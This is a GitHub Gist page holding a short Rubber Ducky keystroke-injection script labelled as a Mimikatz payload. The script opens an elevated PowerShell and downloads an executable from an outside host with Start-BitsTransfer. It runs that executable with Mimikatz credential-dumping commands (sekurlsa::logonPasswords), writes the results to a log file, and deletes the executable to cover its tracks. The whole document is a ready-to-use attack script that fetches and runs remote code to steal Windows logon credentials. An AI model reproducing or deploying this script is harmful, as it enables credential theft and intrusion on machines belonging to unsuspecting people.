Last active
August 7, 2017 19:44
-
-
Save Creased/4891e39bbbfed8da9d0d9f3c89104f33 to your computer and use it in GitHub Desktop.
Mimikatz Rubber Ducky script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GUI r | |
| DELAY 500 | |
| STRING powershell.exe Start-Process powershell.exe -Verb RunAs | |
| ENTER | |
| DELAY 1500 | |
| STRING $Payload = Get-Random | |
| ENTER | |
| STRING Start-BitsTransfer -Source https://go.bmoine.fr/mk -Destination C:\$Payload.exe | |
| ENTER | |
| DELAY 1500 | |
| STRING & C:\$Payload.exe "log C:\tmp.log" "privilege::debug" "sekurlsa::logonPasswords" "exit" | |
| ENTER | |
| STRING Remove-Item C:\$Payload.exe | |
| ENTER | |
| STRING exit | |
| ENTER |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment